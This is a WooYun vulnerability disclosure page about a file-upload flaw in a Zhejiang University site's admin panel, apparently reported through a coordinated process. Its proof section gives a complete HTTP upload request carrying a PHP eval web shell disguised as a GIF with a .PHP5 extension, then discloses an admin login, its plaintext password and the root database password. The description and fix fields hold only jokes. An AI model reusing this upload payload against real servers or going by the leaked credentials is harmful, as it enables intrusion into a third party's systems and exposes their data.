当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167065

漏洞标题:浙江大学某处存在多处漏洞数据库帐号密码等被GETSHELL

相关厂商:浙江大学

漏洞作者: 八神

提交时间:2016-01-05 23:37

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

哎 隔壁的老王偷了我的iPhone

详细说明:

01.png


1.png


2.png


3.png


4.png


5.png


漏洞证明:

POST /admin.php?c=attachments&a=swfupload&dosubmit=1 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
User-Agent: Shockwave Flash
Host: **.**.**.**
Content-Length: 1899
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SpLangCookies=cn; _gscu_742156466=51819580yd5f5234; _gscs_742156466=51819580co97jm34|pv:1; PHPSESSID=540bb846e41d5c77a474d6c573169d44; zjuoluserid=Qg%3D%3D; zjuoladmin_email=HgscFxQ6EAAMD1QPERpCGQQ%3D; zjuoladmin_username=HgscFxQ%3D; zjuolatt_json=AUgUBghYUEdcWkhcRVxAWBkHDE5ASB0bGApQKUAwVR0CGEIAHxYMQh8OAEEPFDZaGhwWBRQLChMGEDNDSFpEWTBVWkRfWCZFR19dTFpEX1hKWERZWE1fQVZCEBoSTUBYDBwDCRQLGApOQEgBCgECRAUwBhdEFBwcX1k3QQYKDVcSEAYRVw4FHkhPWlVJXU1aWVZIBh0PWFBXBxgOGk8zQyZFAhgbVBAADA9UDxEaQhkEKUAZCgYaDggcAxkKMFVYRV5aJkVFXlxONlpdXEtcRV5cTlpHXVtIW0dbWFQABQhOVkgTBgAfBBQCCVhQVxdCEBoSTRE%3D
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filename"
a.cer
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="filetype_post"
aspx|aspx|asp|php5|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="swf_auth_key"
429a371c17329d0af5c61ae3abead687
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_width"
0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="dosubmit"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_height"
0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="isadmin"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="watermark_enable"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="userid"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="groupid"
8
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="SWFUPLOADSESSID"
1451845655
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="catid"
10
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="siteid"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="module"
content
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filedata"; filename="a.PHP5"
Content-Type: application/octet-stream
<?php @eval($_POST['tom']);?>
GIF89a
<?php @eval($_POST['tom']);?>
<?php @eval($_POST[tom])?>
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Upload"
a
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1--


后台帐号:daixx
pass:amanda3020397
--------------------------------------
host => localhost
login => root
pass => zucc@xcb#2012 root数据库密码
database=> zucc
prefix =>
---------------------------------------
哎 隔壁的老王偷了我的iPhone

修复方案:

哎 隔壁的老王偷了我的iPhone 何时我的Rank能够换回来

版权声明:转载请注明来源 八神@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-01-06 07:59

厂商回复:

通知处理中

最新状态:

暂无